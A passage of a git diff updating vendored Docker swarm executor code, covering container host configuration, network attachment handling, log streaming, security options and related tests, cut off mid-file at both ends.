env, Hostname: c.spec().Hostname, WorkingDir: c.spec().Dir, Image: c.image(), @@ -323,22 +343,27 @@ func (c *containerConfig) healthcheck() *enginecontainer.HealthConfig { if hcSpec == nil { return nil } - interval, _ := ptypes.Duration(hcSpec.Interval) - timeout, _ := ptypes.Duration(hcSpec.Timeout) + interval, _ := gogotypes.DurationFromProto(hcSpec.Interval) + timeout, _ := gogotypes.DurationFromProto(hcSpec.Timeout) + startPeriod, _ := gogotypes.DurationFromProto(hcSpec.StartPeriod) return &enginecontainer.HealthConfig{ - Test: hcSpec.Test, - Interval: interval, - Timeout: timeout, - Retries: int(hcSpec.Retries), + Test: hcSpec.Test, + Interval: interval, + Timeout: timeout, + Retries: int(hcSpec.Retries), + StartPeriod: startPeriod, } } func (c *containerConfig) hostConfig() *enginecontainer.HostConfig { hc := &enginecontainer.HostConfig{ - Resources: c.resources(), - GroupAdd: c.spec().Groups, - PortBindings: c.portBindings(), - Mounts: c.mounts(), + Resources: c.resources(), + GroupAdd: c.spec().Groups, + PortBindings: c.portBindings(), + Mounts: c.mounts(), + ReadonlyRootfs: c.spec().ReadOnly, + Isolation: c.isolation(), + Init: c.init(), } if c.spec().DNSConfig != nil { @@ -347,6 +372,8 @@ func (c *containerConfig) hostConfig() *enginecontainer.HostConfig { hc.DNSOptions = c.spec().DNSConfig.Options } + c.applyPrivileges(hc) + // The format of extra hosts on swarmkit is specified in: // http://man7.org/linux/man-pages/man5/hosts.5.html // IP_address canonical_hostname [aliases...] @@ -368,11 +395,19 @@ func (c *containerConfig) hostConfig() *enginecontainer.HostConfig { } } + if len(c.task.Networks) > 0 { + labels := c.task.Networks[0].Network.Spec.Annotations.Labels + name := c.task.Networks[0].Network.Spec.Annotations.Name + if v, ok := labels["com.docker.swarm.predefined"]; ok && v == "true" { + hc.NetworkMode = enginecontainer.NetworkMode(name) + } + } + return hc } // This handles the case of volumes that are defined inside a service Mount -func (c *containerConfig) volumeCreateRequest(mount *api.Mount) *volumetypes.VolumesCreateBody { +func (c *containerConfig) volumeCreateRequest(mount *api.Mount) *volumetypes.VolumeCreateBody { var ( driverName string driverOpts map[string]string @@ -386,7 +421,7 @@ func (c *containerConfig) volumeCreateRequest(mount *api.Mount) *volumetypes.Vol } if mount.VolumeOptions != nil { - return &volumetypes.VolumesCreateBody{ + return &volumetypes.VolumeCreateBody{ Name: mount.Source, Driver: driverName, DriverOpts: driverOpts, @@ -422,7 +457,7 @@ func (c *containerConfig) resources() enginecontainer.Resources { } // Docker daemon supports just 1 network during container create. -func (c *containerConfig) createNetworkingConfig() *network.NetworkingConfig { +func (c *containerConfig) createNetworkingConfig(b executorpkg.Backend) *network.NetworkingConfig { var networks []*api.NetworkAttachment if c.task.Spec.GetContainer() != nil || c.task.Spec.GetAttachment() != nil { networks = c.task.Networks @@ -430,19 +465,18 @@ func (c *containerConfig) createNetworkingConfig() *network.NetworkingConfig { epConfig := make(map[string]*network.EndpointSettings) if len(networks) > 0 { - epConfig[networks[0].Network.Spec.Annotations.Name] = getEndpointConfig(networks[0]) + epConfig[networks[0].Network.Spec.Annotations.Name] = getEndpointConfig(networks[0], b) } return &network.NetworkingConfig{EndpointsConfig: epConfig} } // TODO: Merge this function with createNetworkingConfig after daemon supports multiple networks in container create -func (c *containerConfig) connectNetworkingConfig() *network.NetworkingConfig { +func (c *containerConfig) connectNetworkingConfig(b executorpkg.Backend) *network.NetworkingConfig { var networks []*api.NetworkAttachment if c.task.Spec.GetContainer() != nil { networks = c.task.Networks } - // First network is used during container create. Other networks are used in "docker network connect" if len(networks) < 2 { return nil @@ -450,12 +484,12 @@ func (c *containerConfig) connectNetworkingConfig() *network.NetworkingConfig { epConfig := make(map[string]*network.EndpointSettings) for _, na := range networks[1:] { - epConfig[na.Network.Spec.Annotations.Name] = getEndpointConfig(na) + epConfig[na.Network.Spec.Annotations.Name] = getEndpointConfig(na, b) } return &network.NetworkingConfig{EndpointsConfig: epConfig} } -func getEndpointConfig(na *api.NetworkAttachment) *network.EndpointSettings { +func getEndpointConfig(na *api.NetworkAttachment, b executorpkg.Backend) *network.EndpointSettings { var ipv4, ipv6 string for _, addr := range na.Addresses { ip, _, err := net.ParseCIDR(addr) @@ -473,13 +507,20 @@ func getEndpointConfig(na *api.NetworkAttachment) *network.EndpointSettings { } } - return &network.EndpointSettings{ + n := &network.EndpointSettings{ NetworkID: na.Network.ID, IPAMConfig: &network.EndpointIPAMConfig{ IPv4Address: ipv4, IPv6Address: ipv6, }, + DriverOpts: na.DriverAttachmentOpts, + } + if v, ok := na.Network.Spec.Annotations.Labels["com.docker.swarm.predefined"]; ok && v == "true" { + if ln, err := b.FindNetwork(na.Network.Spec.Annotations.Name); err == nil { + n.NetworkID = ln.ID() + } } + return n } func (c *containerConfig) virtualIP(networkID string) string { @@ -543,19 +584,6 @@ func (c *containerConfig) serviceConfig() *clustertypes.ServiceConfig { return svcCfg } -// networks returns a list of network names attached to the container. The -// returned name can be used to lookup the corresponding network create -// options. -func (c *containerConfig) networks() []string { - var networks []string - - for name := range c.networksAttachments { - networks = append(networks, name) - } - - return networks -} - func (c *containerConfig) networkCreateRequest(name string) (clustertypes.NetworkCreateRequest, error) { na, ok := c.networksAttachments[name] if !ok { @@ -564,29 +592,83 @@ func (c *containerConfig) networkCreateRequest(name string) (clustertypes.Networ options := types.NetworkCreate{ // ID: na.Network.ID, - Driver: na.Network.DriverState.Name, - IPAM: &network.IPAM{ - Driver: na.Network.IPAM.Driver.Name, - Options: na.Network.IPAM.Driver.Options, - }, - Options: na.Network.DriverState.Options, Labels: na.Network.Spec.Annotations.Labels, Internal: na.Network.Spec.Internal, Attachable: na.Network.Spec.Attachable, + Ingress: convert.IsIngressNetwork(na.Network), EnableIPv6: na.Network.Spec.Ipv6Enabled, CheckDuplicate: true, + Scope: netconst.SwarmScope, } - for _, ic := range na.Network.IPAM.Configs { - c := network.IPAMConfig{ - Subnet: ic.Subnet, - IPRange: ic.Range, - Gateway: ic.Gateway, + if na.Network.Spec.GetNetwork() != "" { + options.ConfigFrom = &network.ConfigReference{ + Network: na.Network.Spec.GetNetwork(), } - options.IPAM.Config = append(options.IPAM.Config, c) } - return clustertypes.NetworkCreateRequest{na.Network.ID, types.NetworkCreateRequest{Name: name, NetworkCreate: options}}, nil + if na.Network.DriverState != nil { + options.Driver = na.Network.DriverState.Name + options.Options = na.Network.DriverState.Options + } + if na.Network.IPAM != nil { + options.IPAM = &network.IPAM{ + Driver: na.Network.IPAM.Driver.Name, + Options: na.Network.IPAM.Driver.Options, + } + for _, ic := range na.Network.IPAM.Configs { + c := network.IPAMConfig{ + Subnet: ic.Subnet, + IPRange: ic.Range, + Gateway: ic.Gateway, + } + options.IPAM.Config = append(options.IPAM.Config, c) + } + } + + return clustertypes.NetworkCreateRequest{ + ID: na.Network.ID, + NetworkCreateRequest: types.NetworkCreateRequest{ + Name: name, + NetworkCreate: options, + }, + }, nil +} + +func (c *containerConfig) applyPrivileges(hc *enginecontainer.HostConfig) { + privileges := c.spec().Privileges + if privileges == nil { + return + } + + credentials := privileges.CredentialSpec + if credentials != nil { + switch credentials.Source.(type) { + case *api.Privileges_CredentialSpec_File: + hc.SecurityOpt = append(hc.SecurityOpt, "credentialspec=file://"+credentials.GetFile()) + case *api.Privileges_CredentialSpec_Registry: + hc.SecurityOpt = append(hc.SecurityOpt, "credentialspec=registry://"+credentials.GetRegistry()) + } + } + + selinux := privileges.SELinuxContext + if selinux != nil { + if selinux.Disable { + hc.SecurityOpt = append(hc.SecurityOpt, "label=disable") + } + if selinux.User != "" { + hc.SecurityOpt = append(hc.SecurityOpt, "label=user:"+selinux.User) + } + if selinux.Role != "" { + hc.SecurityOpt = append(hc.SecurityOpt, "label=role:"+selinux.Role) + } + if selinux.Level != "" { + hc.SecurityOpt = append(hc.SecurityOpt, "label=level:"+selinux.Level) + } + if selinux.Type != "" { + hc.SecurityOpt = append(hc.SecurityOpt, "label=type:"+selinux.Type) + } + } } func (c containerConfig) eventFilter() filters.Args { diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/container_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/container_test.go new file mode 100644 index 0000000000..1bf6f6cf02 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/container_test.go @@ -0,0 +1,37 @@ +package container // import "github.com/docker/docker/daemon/cluster/executor/container" + +import ( + "testing" + + "github.com/docker/docker/api/types/container" + swarmapi "github.com/docker/swarmkit/api" + "gotest.tools/assert" +) + +func TestIsolationConversion(t *testing.T) { + cases := []struct { + name string + from swarmapi.ContainerSpec_Isolation + to container.Isolation + }{ + {name: "default", from: swarmapi.ContainerIsolationDefault, to: container.IsolationDefault}, + {name: "process", from: swarmapi.ContainerIsolationProcess, to: container.IsolationProcess}, + {name: "hyperv", from: swarmapi.ContainerIsolationHyperV, to: container.IsolationHyperV}, + } + for _, c := range cases { + t.Run(c.name, func(t *testing.T) { + task := swarmapi.Task{ + Spec: swarmapi.TaskSpec{ + Runtime: &swarmapi.TaskSpec_Container{ + Container: &swarmapi.ContainerSpec{ + Image: "alpine:latest", + Isolation: c.from, + }, + }, + }, + } + config := containerConfig{task: &task} + assert.Equal(t, c.to, config.hostConfig().Isolation) + }) + } +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go index 75f286a217..bcd426e73d 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go @@ -1,11 +1,8 @@ -package container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" import ( - "bufio" - "bytes" - "encoding/binary" + "context" "fmt" - "io" "os" "strconv" "strings" @@ -19,22 +16,22 @@ import ( "github.com/docker/swarmkit/agent/exec" "github.com/docker/swarmkit/api" "github.com/docker/swarmkit/log" - "github.com/docker/swarmkit/protobuf/ptypes" + gogotypes "github.com/gogo/protobuf/types" "github.com/pkg/errors" - "golang.org/x/net/context" "golang.org/x/time/rate" ) +const defaultGossipConvergeDelay = 2 * time.Second + // controller implements agent.Controller against docker's API. // // Most operations against docker's API are done through the container name, // which is unique to the task. type controller struct { - task *api.Task - adapter *containerAdapter - closed chan struct{} - err error - + task *api.Task + adapter *containerAdapter + closed chan struct{} + err error pulled chan struct{} // closed after pull cancelPull func() // cancels pull context if not nil pullErr error // pull error, only read after pulled closed @@ -43,8 +40,8 @@ type controller struct { var _ exec.Controller = &controller{} // NewController returns a docker exec runner for the provided task. -func newController(b executorpkg.Backend, task *api.Task, secrets exec.SecretGetter) (*controller, error) { - adapter, err := newContainerAdapter(b, task, secrets) +func newController(b executorpkg.Backend, i executorpkg.ImageBackend, v executorpkg.VolumeBackend, task *api.Task, node *api.NodeDescription, dependencies exec.DependencyGetter) (*controller, error) { + adapter, err := newContainerAdapter(b, i, v, task, node, dependencies) if err != nil { return nil, err } @@ -148,7 +145,6 @@ func (r *controller) Prepare(ctx context.Context) error { } } } - if err := r.adapter.create(ctx); err != nil { if isContainerCreateNameConflict(err) { if _, err := r.adapter.inspect(ctx); err != nil { @@ -187,7 +183,7 @@ func (r *controller) Start(ctx context.Context) error { for { if err := r.adapter.start(ctx); err != nil { - if _, ok := err.(libnetwork.ErrNoSuchNetwork); ok { + if _, ok := errors.Cause(err).(libnetwork.ErrNoSuchNetwork); ok { // Retry network creation again if we // failed because some of the networks // were not found. @@ -205,7 +201,7 @@ func (r *controller) Start(ctx context.Context) error { } // no health check - if ctnr.Config == nil || ctnr.Config.Healthcheck == nil { + if ctnr.Config == nil || ctnr.Config.Healthcheck == nil || len(ctnr.Config.Healthcheck.Test) == 0 || ctnr.Config.Healthcheck.Test[0] == "NONE" { if err := r.adapter.activateServiceBinding(); err != nil { log.G(ctx).WithError(err).Errorf("failed to activate service binding for container %s which has no healthcheck config", r.adapter.container.name()) return err @@ -213,12 +209,6 @@ func (r *controller) Start(ctx context.Context) error { return nil } - healthCmd := ctnr.Config.Healthcheck.Test - - if len(healthCmd) == 0 || healthCmd[0] == "NONE" { - return nil - } - // wait for container to be healthy eventq := r.adapter.events(ctx) @@ -287,30 +277,50 @@ func (r *controller) Wait(pctx context.Context) error { } }() - err := r.adapter.wait(ctx) - if ctx.Err() != nil { - return ctx.Err() + waitC, err := r.adapter.wait(ctx) + if err != nil { + return err } - if err != nil { - ee := &exitError{} - if ec, ok := err.(exec.ExitCoder); ok { - ee.code = ec.ExitCode() + if status := <-waitC; status.ExitCode() != 0 { + exitErr := &exitError{ + code: status.ExitCode(), } + + // Set the cause if it is knowable. select { case e := <-healthErr: - ee.cause = e + exitErr.cause = e default: - if err.Error() != "" { - ee.cause = err + if status.Err() != nil { + exitErr.cause = status.Err() } } - return ee + + return exitErr } return nil } +func (r *controller) hasServiceBinding() bool { + if r.task == nil { + return false + } + + // service is attached to a network besides the default bridge + for _, na := range r.task.Networks { + if na.Network == nil || + na.Network.DriverState == nil || + na.Network.DriverState.Name == "bridge" && na.Network.Spec.Annotations.Name == "bridge" { + continue + } + return true + } + + return false +} + // Shutdown the container cleanly. func (r *controller) Shutdown(ctx context.Context) error { if err := r.checkClosed(); err != nil { @@ -321,10 +331,18 @@ func (r *controller) Shutdown(ctx context.Context) error { r.cancelPull() } - // remove container from service binding - if err := r.adapter.deactivateServiceBinding(); err != nil { - log.G(ctx).WithError(err).Errorf("failed to deactivate service binding for container %s", r.adapter.container.name()) - return err + if r.hasServiceBinding() { + // remove container from service binding + if err := r.adapter.deactivateServiceBinding(); err != nil { + log.G(ctx).WithError(err).Warningf("failed to deactivate service binding for container %s", r.adapter.container.name()) + // Don't return an error here, because failure to deactivate + // the service binding is expected if the container was never + // started. + } + + // add a delay for gossip converge + // TODO(dongluochen): this delay should be configurable to fit different cluster size and network delay. + time.Sleep(defaultGossipConvergeDelay) } if err := r.adapter.shutdown(ctx); err != nil { @@ -445,15 +463,27 @@ func (r *controller) Logs(ctx context.Context, publisher exec.LogPublisher, opti return err } - if err := r.waitReady(ctx); err != nil { - return errors.Wrap(err, "container not ready for logs") + // if we're following, wait for this container to be ready. there is a + // problem here: if the container will never be ready (for example, it has + // been totally deleted) then this will wait forever. however, this doesn't + // actually cause any UI issues, and shouldn't be a problem. the stuck wait + // will go away when the follow (context) is canceled. + if options.Follow { + if err := r.waitReady(ctx); err != nil { + return errors.Wrap(err, "container not ready for logs") + } } + // if we're not following, we're not gonna wait for the container to be + // ready. just call logs. if the container isn't ready, the call will fail + // and return an error. no big deal, we don't care, we only want the logs + // we can get RIGHT NOW with no follow - rc, err := r.adapter.logs(ctx, options) + logsContext, cancel := context.WithCancel(ctx) + msgs, err := r.adapter.logs(logsContext, options) + defer cancel() if err != nil { return errors.Wrap(err, "failed getting container logs") } - defer rc.Close() var ( // use a rate limiter to keep things under control but also provides some @@ -466,53 +496,48 @@ func (r *controller) Logs(ctx context.Context, publisher exec.LogPublisher, opti } ) - brd := bufio.NewReader(rc) for { - // so, message header is 8 bytes, treat as uint64, pull stream off MSB - var header uint64 - if err := binary.Read(brd, binary.BigEndian, &header); err != nil { - if err == io.EOF { - return nil - } - - return errors.Wrap(err, "failed reading log header") + msg, ok := <-msgs + if !ok { + // we're done here, no more messages + return nil } - stream, size := (header>>(7<<3))&0xFF, header & ^(uint64(0xFF)<<(7<<3)) + if msg.Err != nil { + // the defered cancel closes the adapter's log stream + return msg.Err + } - // limit here to decrease allocation back pressure. - if err := limiter.WaitN(ctx, int(size)); err != nil { + // wait here for the limiter to catch up + if err := limiter.WaitN(ctx, len(msg.Line)); err != nil { return errors.Wrap(err, "failed rate limiter") } - - buf := make([]byte, size) - _, err := io.ReadFull(brd, buf) + tsp, err := gogotypes.TimestampProto(msg.Timestamp) if err != nil { - return errors.Wrap(err, "failed reading buffer") + return errors.Wrap(err, "failed to convert timestamp") } - - // Timestamp is RFC3339Nano with 1 space after. Lop, parse, publish - parts := bytes.SplitN(buf, []byte(" "), 2) - if len(parts) != 2 { - return fmt.Errorf("invalid timestamp in log message: %v", buf) + var stream api.LogStream + if msg.Source == "stdout" { + stream = api.LogStreamStdout + } else if msg.Source == "stderr" { + stream = api.LogStreamStderr } - ts, err := time.Parse(time.RFC3339Nano, string(parts[0])) - if err != nil { - return errors.Wrap(err, "failed to parse timestamp") - } - - tsp, err := ptypes.TimestampProto(ts) - if err != nil { - return errors.Wrap(err, "failed to convert timestamp") + // parse the details out of the Attrs map + var attrs []api.LogAttr + if len(msg.Attrs) != 0 { + attrs = make([]api.LogAttr, 0, len(msg.Attrs)) + for _, attr := range msg.Attrs { + attrs = append(attrs, api.LogAttr{Key: attr.Key, Value: attr.Value}) + } } if err := publisher.Publish(ctx, api.LogMessage{ Context: msgctx, Timestamp: tsp, - Stream: api.LogStream(stream), - - Data: parts[1], + Stream: stream, + Attrs: attrs, + Data: msg.Line, }); err != nil { return errors.Wrap(err, "failed to publish log message") } @@ -539,15 +564,8 @@ func (r *controller) matchevent(event events.Message) bool { if event.Type != events.ContainerEventType { return false } - - // TODO(stevvooe): Filter based on ID matching, in addition to name. - - // Make sure the events are for this container. - if event.Actor.Attributes["name"] != r.adapter.container.name() { - return false - } - - return true + // we can't filter using id since it will have huge chances to introduce a deadlock. see #33377. + return event.Actor.Attributes["name"] == r.adapter.container.name() } func (r *controller) checkClosed() error { @@ -603,6 +621,8 @@ func parsePortMap(portMap nat.PortMap) ([]*api.PortConfig, error) { protocol = api.ProtocolTCP case "udp": protocol = api.ProtocolUDP + case "sctp": + protocol = api.ProtocolSCTP default: return nil, fmt.Errorf("invalid protocol: %s", parts[1]) } @@ -641,7 +661,7 @@ func (e *exitError) Error() string { } func (e *exitError) ExitCode() int { - return int(e.code) + return e.code } func (e *exitError) Cause() error { diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go index 63e1233566..4c90b9e0a2 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go @@ -1,15 +1,17 @@ -package container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" -import "fmt" +import ( + "errors" +) var ( // ErrImageRequired returned if a task is missing the image definition. - ErrImageRequired = fmt.Errorf("dockerexec: image required") + ErrImageRequired = errors.New("dockerexec: image required") // ErrContainerDestroyed returned when a container is prematurely destroyed // during a wait call. - ErrContainerDestroyed = fmt.Errorf("dockerexec: container destroyed") + ErrContainerDestroyed = errors.New("dockerexec: container destroyed") // ErrContainerUnhealthy returned if controller detects the health check failure - ErrContainerUnhealthy = fmt.Errorf("dockerexec: unhealthy container") + ErrContainerUnhealthy = errors.New("dockerexec: unhealthy container") ) diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go index f0dedd4530..940a943e4f 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go @@ -1,30 +1,47 @@ -package container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" import ( + "context" + "fmt" "sort" "strings" + "sync" "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/network" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/controllers/plugin" + "github.com/docker/docker/daemon/cluster/convert" executorpkg "github.com/docker/docker/daemon/cluster/executor" clustertypes "github.com/docker/docker/daemon/cluster/provider" networktypes "github.com/docker/libnetwork/types" + "github.com/docker/swarmkit/agent" "github.com/docker/swarmkit/agent/exec" - "github.com/docker/swarmkit/agent/secrets" "github.com/docker/swarmkit/api" - "golang.org/x/net/context" + "github.com/docker/swarmkit/api/naming" + "github.com/docker/swarmkit/template" + "github.com/sirupsen/logrus" ) type executor struct { - backend executorpkg.Backend - secrets exec.SecretsManager + backend executorpkg.Backend + imageBackend executorpkg.ImageBackend + pluginBackend plugin.Backend + volumeBackend executorpkg.VolumeBackend + dependencies exec.DependencyManager + mutex sync.Mutex // This mutex protects the following node field + node *api.NodeDescription } // NewExecutor returns an executor from the docker client. -func NewExecutor(b executorpkg.Backend) exec.Executor { +func NewExecutor(b executorpkg.Backend, p plugin.Backend, i executorpkg.ImageBackend, v executorpkg.VolumeBackend) exec.Executor { return &executor{ - backend: b, - secrets: secrets.NewManager(), + backend: b, + pluginBackend: p, + imageBackend: i, + volumeBackend: v, + dependencies: agent.NewDependencyManager(), } } @@ -51,9 +68,10 @@ func (e *executor) Describe(ctx context.Context) (*api.NodeDescription, error) { // the plugin list by default. addPlugins("Network", append([]string{"overlay"}, info.Plugins.Network...)) addPlugins("Authorization", info.Plugins.Authorization) + addPlugins("Log", info.Plugins.Log) // add v2 plugins - v2Plugins, err := e.backend.PluginManager().List() + v2Plugins, err := e.backend.PluginManager().List(filters.NewArgs()) if err == nil { for _, plgn := range v2Plugins { for _, typ := range plgn.Config.Interface.Types { @@ -61,11 +79,15 @@ func (e *executor) Describe(ctx context.Context) (*api.NodeDescription, error) { continue } plgnTyp := typ.Capability - if typ.Capability == "volumedriver" { + switch typ.Capability { + case "volumedriver": plgnTyp = "Volume" - } else if typ.Capability == "networkdriver" { + case "networkdriver": plgnTyp = "Network" + case "logdriver": + plgnTyp = "Log" } + plugins[api.PluginDescription{ Type: plgnTyp, Name: plgn.Name, @@ -106,28 +128,59 @@ func (e *executor) Describe(ctx context.Context) (*api.NodeDescription, error) { Resources: &api.Resources{ NanoCPUs: int64(info.NCPU) * 1e9, MemoryBytes: info.MemTotal, + Generic: convert.GenericResourcesToGRPC(info.GenericResources), }, } + // Save the node information in the executor field + e.mutex.Lock() + e.node = description + e.mutex.Unlock() + return description, nil } func (e *executor) Configure(ctx context.Context, node *api.Node) error { - na := node.Attachment - if na == nil { - return nil + var ingressNA *api.NetworkAttachment + attachments := make(map[string]string) + + for _, na := range node.Attachments { + if na == nil || na.Network == nil || len(na.Addresses) == 0 { + // this should not happen, but we got a panic here and don't have a + // good idea about what the underlying data structure looks like. + logrus.WithField("NetworkAttachment", fmt.Sprintf("%#v", na)). + Warnf("skipping nil or malformed node network attachment entry") + continue + } + + if na.Network.Spec.Ingress { + ingressNA = na + } + + attachments[na.Network.ID] = na.Addresses[0] + } + + if (ingressNA == nil) && (node.Attachment != nil) && (len(node.Attachment.Addresses) > 0) { + ingressNA = node.Attachment + attachments[ingressNA.Network.ID] = ingressNA.Addresses[0] + } + + if ingressNA == nil { + e.backend.ReleaseIngress() + return e.backend.GetAttachmentStore().ResetAttachments(attachments) } options := types.NetworkCreate{ - Driver: na.Network.DriverState.Name, + Driver: ingressNA.Network.DriverState.Name, IPAM: &network.IPAM{ - Driver: na.Network.IPAM.Driver.Name, + Driver: ingressNA.Network.IPAM.Driver.Name, }, - Options: na.Network.DriverState.Options, + Options: ingressNA.Network.DriverState.Options, + Ingress: true, CheckDuplicate: true, } - for _, ic := range na.Network.IPAM.Configs { + for _, ic := range ingressNA.Network.IPAM.Configs { c := network.IPAMConfig{ Subnet: ic.Subnet, IPRange: ic.Range, @@ -136,24 +189,66 @@ func (e *executor) Configure(ctx context.Context, node *api.Node) error { options.IPAM.Config = append(options.IPAM.Config, c) } - return e.backend.SetupIngress(clustertypes.NetworkCreateRequest{ - na.Network.ID, - types.NetworkCreateRequest{ - Name: na.Network.Spec.Annotations.Name, + _, err := e.backend.SetupIngress(clustertypes.NetworkCreateRequest{ + ID: ingressNA.Network.ID, + NetworkCreateRequest: types.NetworkCreateRequest{ + Name: ingressNA.Network.Spec.Annotations.Name, NetworkCreate: options, }, - }, na.Addresses[0]) + }, ingressNA.Addresses[0]) + if err != nil { + return err + } + + return e.backend.GetAttachmentStore().ResetAttachments(attachments) } // Controller returns a docker container runner. func (e *executor) Controller(t *api.Task) (exec.Controller, error) { + dependencyGetter := template.NewTemplatedDependencyGetter(agent.Restrict(e.dependencies, t), t, nil) + + // Get the node description from the executor field + e.mutex.Lock() + nodeDescription := e.node + e.mutex.Unlock() + if t.Spec.GetAttachment() != nil { - return newNetworkAttacherController(e.backend, t, e.secrets) + return newNetworkAttacherController(e.backend, e.imageBackend, e.volumeBackend, t, nodeDescription, dependencyGetter) } - ctlr, err := newController(e.backend, t, e.secrets) - if err != nil { - return nil, err + var ctlr exec.Controller + switch r := t.Spec.GetRuntime().(type) { + case *api.TaskSpec_Generic: + logrus.WithFields(logrus.Fields{ + "kind": r.Generic.Kind, + "type_url": r.Generic.Payload.TypeUrl, + }).Debug("custom runtime requested") + runtimeKind, err := naming.Runtime(t.Spec) + if err != nil { + return ctlr, err + } + switch runtimeKind { + case string(swarmtypes.RuntimePlugin): + info, _ := e.backend.SystemInfo() + if !info.ExperimentalBuild { + return ctlr, fmt.Errorf("runtime type %q only supported in experimental", swarmtypes.RuntimePlugin) + } + c, err := plugin.NewController(e.pluginBackend, t) + if err != nil { + return ctlr, err + } + ctlr = c + default: + return ctlr, fmt.Errorf("unsupported runtime type: %q", runtimeKind) + } + case *api.TaskSpec_Container: + c, err := newController(e.backend, e.imageBackend, e.volumeBackend, t, nodeDescription, dependencyGetter) + if err != nil { + return ctlr, err + } + ctlr = c + default: + return ctlr, fmt.Errorf("unsupported runtime: %q", r) } return ctlr, nil @@ -177,7 +272,11 @@ func (e *executor) SetNetworkBootstrapKeys(keys []*api.EncryptionKey) error { } func (e *executor) Secrets() exec.SecretsManager { - return e.secrets + return e.dependencies.Secrets() +} + +func (e *executor) Configs() exec.ConfigsManager { + return e.dependencies.Configs() } type sortedPlugins []api.PluginDescription diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go index 99cf7502af..03d6273635 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go @@ -1,8 +1,9 @@ // +build !windows -package container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" import ( + "context" "testing" "time" @@ -11,7 +12,6 @@ import ( "github.com/docker/docker/daemon" "github.com/docker/docker/daemon/events" "github.com/docker/swarmkit/api" - "golang.org/x/net/context" ) func TestHealthStates(t *testing.T) { @@ -38,14 +38,12 @@ func TestHealthStates(t *testing.T) { } c := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "id", - Name: "name", - Config: &containertypes.Config{ - Image: "image_name", - Labels: map[string]string{ - "com.docker.swarm.task.id": "id", - }, + ID: "id", + Name: "name", + Config: &containertypes.Config{ + Image: "image_name", + Labels: map[string]string{ + "com.docker.swarm.task.id": "id", }, }, } @@ -54,7 +52,7 @@ func TestHealthStates(t *testing.T) { EventsService: e, } - controller, err := newController(daemon, task, nil) + controller, err := newController(daemon, nil, nil, task, nil, nil) if err != nil { t.Fatalf("create controller fail %v", err) } @@ -87,7 +85,7 @@ func TestHealthStates(t *testing.T) { } case <-timer.C: if expectedErr != nil { - t.Fatalf("time limit exceeded, didn't get expected error") + t.Fatal("time limit exceeded, didn't get expected error") } } } diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go index 5fda1f2edb..cbe1f53c38 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go @@ -1,6 +1,7 @@ -package container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" import ( + "errors" "fmt" "path/filepath" @@ -29,7 +30,7 @@ func validateMounts(mounts []api.Mount) error { } case api.MountTypeTmpfs: if mount.Source != "" { - return fmt.Errorf("invalid tmpfs source, source must be empty") + return errors.New("invalid tmpfs source, source must be empty") } default: return fmt.Errorf("invalid mount type: %s", mount.Type) diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go index 9d98e2c008..5e4694ff1b 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go @@ -1,4 +1,4 @@ -package container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" import ( "io/ioutil" @@ -12,7 +12,7 @@ import ( ) func newTestControllerWithMount(m api.Mount) (*controller, error) { - return newController(&daemon.Daemon{}, &api.Task{ + return newController(&daemon.Daemon{}, nil, nil, &api.Task{ ID: stringid.GenerateRandomID(), ServiceID: stringid.GenerateRandomID(), Spec: api.TaskSpec{ @@ -26,7 +26,8 @@ func newTestControllerWithMount(m api.Mount) (*controller, error) { }, }, }, - }, nil) + }, nil, + nil) } func TestControllerValidateMountBind(t *testing.T) { diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go index c616eeef93..7a3f053621 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go @@ -1,6 +1,6 @@ // +build !windows -package container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" const ( testAbsPath = "/foo" diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go index c346451d3d..6ee4c96431 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go @@ -1,6 +1,6 @@ // +build windows -package 